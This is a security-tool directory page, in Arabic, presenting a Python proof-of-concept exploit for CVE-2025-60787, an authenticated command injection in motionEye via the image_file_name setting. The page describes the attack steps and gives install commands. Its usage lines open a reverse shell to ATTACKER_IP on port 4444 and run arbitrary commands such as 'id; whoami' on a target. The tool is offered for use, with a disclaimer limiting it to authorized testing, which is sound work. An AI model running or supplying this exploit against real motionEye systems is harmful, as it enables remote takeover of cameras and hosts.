Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-60787-POC — PoC بلغة بايثون لـ CVE-2025-60787، ثغرة حقن أوامر نظام تشغيل موثّقة تؤدي إلى تنفيذ تعليمات برمجية عن بُعد في motionEye <= 0.43.1b4 عبر إعداد image_file_name غير المعقّم. | Kitploit
أدوات/GitHubGitHub/d3vn0mi/cve-2025-60787-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمرتطوير الحمولات
GitHubd3vn0mi/cve-2025-60787-poc

CVE-2025-60787-POC

PoC بلغة بايثون لـ CVE-2025-60787، ثغرة حقن أوامر نظام تشغيل موثّقة تؤدي إلى تنفيذ تعليمات برمجية عن بُعد في motionEye <= 0.43.1b4 عبر إعداد image_file_name غير المعقّم.

عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-60787 - تنفيذ أوامر عن بعد موثوق في motionEye

تنفيذ أوامر عن بعد موثوق في motionEye <= 0.43.1b4 عبر معامل تكوين motion غير مُعقّم

المؤلف: d3vn0mi


نظرة عامة على الثغرة

الحقلالتفاصيل
معرف CVECVE-2025-60787
درجة CVSS7.2 (عالي)
النوعحقن أوامر نظام التشغيل (CWE-78)
المتأثرmotionEye <= 0.43.1b4
تم الإصلاح في0.43.1b5

يقبل motionEye سلاسل عشوائية في حقول التكوين مثل image_file_name ويكتبها مباشرة في ملفات تكوين Motion (/etc/motioneye/camera-*.conf). عند إعادة تشغيل خدمة Motion، فإنها تفسر هذه الحقول كسلاسل قابلة للتوسع في الصدفة، مما يسمح لمهاجم موثوق بحقن وتنفيذ أوامر نظام تشغيل عشوائية.

تتضمن الواجهة الرسومية للمستخدم التحقق من صحة الجهة العميلة لهذه الحقول، ولكن يمكن تجاوز ذلك بسهولة عن طريق إرسال طلبات API مخصصة مباشرة.

سير الهجوم

  1. المصادقة على motionEye باستخدام بيانات اعتماد مسؤول صالحة
  2. جلب قائمة تكوين الكاميرا
  3. إرسال طلب POST بتكوين معدل بقيمة image_file_name ضارة
  4. يعالج Motion الأمر المحقون عند التقاط لقطات (عبر capture_mode: interval-snapshots)

المتطلبات

  • Python 3.6+
  • مكتبة requests
  • بيانات اعتماد مسؤول صالحة لـ motionEye
  • وصول شبكي إلى مثيل motionEye الهدف

التثبيت

root@kitploit:~
git clone https://github.com/d3vn0mi/CVE-2025-60787-POC.git
cd CVE-2025-60787-POC
pip install -r requirements.txt

الاستخدام

يدعم الاستغلال وضعين: shell عكسي و تنفيذ أوامر.

Shell عكسي

ابدأ مستمعًا على جهازك، ثم قم بتشغيل:

root@kitploit:~
python3 exploit.py revshell \
    --url http://TARGET:8765 \
    --user admin \
    --password SECRET \
    -i ATTACKER_IP \
    --port 4444

تنفيذ الأوامر

root@kitploit:~
python3 exploit.py command \
    --url http://TARGET:8765 \
    --user admin \
    --password SECRET \
    -e "id; whoami"

الخيارات

المراجع

  • استشارة GitHub - GHSA-j945-qm58-4gjx
  • Exploit-DB #52481
  • وحدة Rapid7 Metasploit
  • مشروع motionEye

الإسناد

  • d3vn0mi - تطوير الاستغلال والأدوات
  • gunzf0x - اكتشاف الثغرة CVE الأصلية والبحث

إخلاء مسؤولية

تُوفَّر هذه الأداة لأغراض اختبار الأمان المصرح به والتعليم فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. لا يتحمل المؤلف أي مسؤولية عن سوء استخدام هذا البرنامج. احصل دائمًا على الإذن المناسب قبل الاختبار.

الترخيص

هذا المشروع مرخص بموجب رخصة MIT.

تنزيل الأداة
العلامةالوصف
--urlرابط motionEye الهدف بما في ذلك المنفذ
--userاسم مستخدم motionEye
--passwordكلمة مرور motionEye
-i / --hostIP المستمع (وضع shell العكسي)
--portمنفذ المستمع (وضع shell العكسي)
-e / --execالأمر المراد تنفيذه (وضع الأوامر)
--camera-idاستهداف معرّف كاميرا محدد
--shاستخدام /bin/sh بدلاً من /bin/bash
--no-verifyتخطي التحقق من شهادة TLS
--proxyتوجيه الحركة عبر وكيل (مثال: http://127.0.0.1:8080)